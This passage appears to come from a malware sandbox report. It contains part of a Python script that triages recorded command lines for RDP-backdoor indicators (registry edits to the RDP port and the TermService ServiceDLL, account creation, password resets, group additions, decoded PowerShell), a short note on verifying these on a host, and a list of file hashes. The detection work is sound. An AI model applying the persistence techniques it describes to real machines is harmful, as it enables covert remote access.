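def parse_reg_add(toks):
    """(key, value_name, type, data) for a 'reg add' command line, else None."""
    if len(toks) < 3 or basename(toks[0]) not in ('reg', 'reg.exe') or toks[1].lower() != 'add':
        return None
    fields = {}
    for i in range(3, len(toks) - 1):
        if toks[i].lower() in ('/v', '/t', '/d'):
            fields[toks[i].lower()] = toks[i + 1]
    return toks[2], fields.get('/v'), fields.get('/t'), fields.get('/d')


def reg_int(data):
    """reg.exe takes REG_DWORD data as decimal or 0x-prefixed hex."""
    return int(data, 16) if data.lower().startswith('0x') else int(data, 10)


def parse_net(toks):
    """(subcommand, target, positional args, switches) for a net/net1 command line, else None."""
    if len(toks) < 3 or basename(toks[0]) not in ('net', 'net.exe', 'net1', 'net1.exe'):
        return None
    switches = {t.lower() for t in toks[3:] if t.startswith('/')}
    args = [t for t in toks[3:] if not t.startswith('/')]
    return toks[1].lower(), toks[2], args, switches


def triage(cmdlines):
    """Collect the RDP-backdoor and privilege-change indicators from a list of command lines."""
    out = {'rdp_port': None, 'termservice_dll': None, 'registry': [],
           'accounts_created': [], 'accounts_deleted': [], 'password_set': [],
           'group_additions': {}, 'decoded_commands': [], 'urls': []}
    for line in cmdlines:
        toks = unwrap_cmd(tokens(line))
        if not toks:
            continue
        reg = parse_reg_add(toks)
        if reg:
            key, name, _typ, data = reg
            out['registry'].append((key, name, data))
            if key.lower().endswith(r'winstations\rdp-tcp') and (name or '').lower() == 'portnumber':
                out['rdp_port'] = reg_int(data)  # 0x1C21 -> 7201
            if r'services\termservice\parameters' in key.lower() and (name or '').lower() == 'servicedll':
                out['termservice_dll'] = data  # svchost loads this path as the RDP service
            continue
        net = parse_net(toks)
        if net:
            sub, target, args, sw = net
            if sub == 'user':
                if '/add' in sw:
                    out['accounts_created'].append(target)
                elif sw & {'/del', '/delete'}:
                    out['accounts_deleted'].append(target)
                elif args:  # "net user NAME PASSWORD" with no switch resets the password
                    out['password_set'].append(target)
            elif sub == 'localgroup' and '/add' in sw:
                out['group_additions'].setdefault(target.lower(), []).extend(args)
            continue
        decoded = decode_encoded_command(toks)
        if decoded:
            out['decoded_commands'].append(decoded)
            out['urls'].extend(re.findall(r'https?://[^\s"\'()]+', decoded))
    return out


if __name__ == '__main__':
    for k, v in triage(CMDLINES).items():
        print(f'{k}: {v}')
```

The matching is done on image name and arguments rather than on PID because the report reuses PIDs within the run (3812 is reg.exe in one entry and cmd.exe in another, 2808 is both powershell.exe and net.exe), so a PID-keyed lookup would merge unrelated processes. On a live host the same three findings are what to verify first: the PortNumber under WinStations\RDP-Tcp, the ServiceDLL of TermService (it should resolve to termsrv.dll under System32, not to a file under C:\Windows\branding), and the membership of the local Administrators and Remote Desktop Users groups.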
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5
dd2bd9e89f270d2cadc103665c9f48d3
SHA1
ba70dfe57ec4a7295c9c6e3bdf16e151d086c509
SHA256
213e58dda308f6e59ee98a451cf2869e67e4611521967d98a3c32b67eea65561
SHA512
3061041007dfc13ca3f658ee5fe06a2b01c759c5507dc4c3075cf2f45ab7a9d7121476e5df7fdc4243ca0620c9f7fb8082f897d0561371d30967aa7fcc147453
-
MD5
f784c76a5f451d89ecd31dc71a8c26cb
SHA1
81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256
8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512
5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981
-
MD5
131ca5240a8c5574648dfc8239478f34
SHA1
b0150dc97e296f82881cf3ab75e52fb048f16dc4
SHA256
d6a66d935fa38011c2e25cd50d5dec88505154eadf43ec3de306047586d89746
SHA512
ff12ab0ddec4abed31d8f83ec53ee5c1c9be1ea02c89ef6ce7acf5850357cb9c9b6157d33b6242d3318766de96991614f3f49b03b109ecf92da42acde57b249d
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
d12b1ff3595abef1e967e7810a903ae0
SHA1
62112b3f78a7668b5fbc9d5c1e814ac4bb6b261f
SHA256
cf8f1e066b891d4fea84020d0c1b44cba113c14353e57d3a9854f848418b688b
SHA512
ef0f0e28bfe06eb2da9f19cf338562a1960f99d61cf8160dee19778c00bed650cc02a38c3b30ddc1c38e54d4c3a25dd9a3ca645c3bb72302cd7a7791f5196f18
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
755df1ce73deb575fea1a4ae46275374
SHA1
487a61f48c88b5e92df5c706077ea410a5e5cdfb
SHA256
a171aea10a12a09c4ca7ed50515b76a866d51f5d6cc5478fa690f958f0c2d1be
SHA512
611fe0199da71c20a2c4ddc9105d879fbdafe4594f3bd61521dc24c7cabbae80e5c3c62a47c7a4037eab0bbe9b71453b979e04b893a26b9d67387eb675f9975b
-
MD5
02de1d05ec7c49607d0469e7731760c6
SHA1
39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256
dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512
a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82
-
MD5
a82cc23d45b8e1de9897fa40dbfebecb
SHA1
16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256
300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512
b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a